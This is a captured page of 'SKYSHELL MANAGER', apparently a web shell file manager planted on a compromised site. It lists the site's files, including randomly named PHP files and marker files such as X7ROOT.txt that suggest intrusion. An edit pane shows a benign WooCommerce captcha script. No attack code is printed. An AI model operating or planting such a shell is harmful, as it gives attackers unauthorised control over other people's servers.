📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: woocommerce.js
/* https://wordpress.stackexchange.com/questions/342148/list-of-js-events-in-the-woocommerce-frontend/352171#352171 */ jQuery(document).ready(function() { jQuery(document.body).on('update_checkout updated_checkout applied_coupon_in_checkout removed_coupon_in_checkout', function() { if(jQuery('.cf-turnstile').length && turnstile) { jQuery('.cf-turnstile').each(function(){ if(this.id !== 'lz-turnstile-div'){ return; } if(jQuery(this).is(':empty')){ let container = jQuery(this); turnstile.remove(container[0]); turnstile.render(container[0]); } }); } if(jQuery('.g-recaptcha').length && grecaptcha){ jQuery('.g-recaptcha').each(function(){ if(jQuery(this).is(':empty')){ let container = jQuery(this), siteKey = container.data('sitekey'); if(siteKey){ grecaptcha.render(container[0], {'sitekey': siteKey}); } } }) } }); }); /* Woo Checkout Block */ document.addEventListener('DOMContentLoaded', function () { if(wp && wp.data){ var unsubscribe = wp.data.subscribe( function () { var turnstile_item = jQuery('#lz-turnstile-div'), math_input = jQuery('#loginizer_cap_math'), grecaptcha_item = jQuery('.lz-recaptcha'), hcaptcha_item = jQuery('.h-captcha'); // making sure we load it only when v3 is enabled if(typeof lz_cap_div_class != 'undefined' && lz_cap_ver == '3'){ var grecaptcha_v3_input = jQuery('.lz-v3-input'); } // This only for reCaptcha v2 invisible, should not work with the checkbox one if(typeof lz_cap_ver != 'undefined' && lz_cap_ver == '2' && lz_cap_invisible == '1'){ var grecaptcha_v2_input = jQuery('#g-recaptcha-response'); } // turnstile if(typeof turnstile != 'undefined' && turnstile_item && turnstile_item.length){ turnstile.render(turnstile_item[0], { sitekey: turnstile_item.data('sitekey'), callback: function(data){ wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: data, }); }, }); unsubscribe(); } // Google captcha, v2 if(typeof grecaptcha != 'undefined' && grecaptcha_item && grecaptcha_item.length && typeof grecaptcha_v3_input == 'undefined'){ grecaptcha.ready(() => { grecaptcha.render(grecaptcha_item[0], { sitekey: grecaptcha_item.data('sitekey'), callback: function(data){ wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: data, }); }, }); }); unsubscribe(); } // hcaptcha if(typeof hcaptcha != 'undefined' && hcaptcha_item && hcaptcha_item.length){ hcaptcha.render(hcaptcha_item[0], { sitekey: hcaptcha_item.data('sitekey'), callback: function(data){ wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: data, }); }, }); unsubscribe(); } // math captcha if(math_input && math_input.length && !math_input.data('listener_added')){ math_input.on('change', function(e){ let data = e.currentTarget.value; wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: data, }); }); // flag to make sure we dont add event listener again math_input.data('listener_added', true); unsubscribe(); } // recaptcha v3 if(grecaptcha_v3_input && grecaptcha_v3_input.length && !grecaptcha_v3_input.data('listener_added')){ // this is to make sure, if the value is set before the event listener_added // then it could be added directly to the extension. if(grecaptcha_v3_input.val()){ wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: grecaptcha_v3_input.val(), }); } grecaptcha_v3_input.on('change', function(e){ let data = e.currentTarget.value; wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: data, }); }); // flag to make sure we dont add event listener again grecaptcha_v3_input.data('listener_added', true); unsubscribe(); } // recaptcha v2 invisible if(grecaptcha_v2_input && grecaptcha_v2_input.length && !grecaptcha_v2_input.data('listener_added')){ // this is to make sure, if the value is set before the event listener_added // then it could be added directly to the extension. if(grecaptcha_v2_input.val()){ wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: grecaptcha_v2_input.val(), }); } grecaptcha_v2_input.on('change', function(e){ let data = e.currentTarget.value; wp.data .dispatch('wc/store/checkout') .setExtensionData('loginizer-security-captcha', { token: data, }); }); // flag to make sure we dont add event listener again grecaptcha_v2_input.data('listener_added', true); unsubscribe(); } }, 'wc/store/cart'); } } );
Save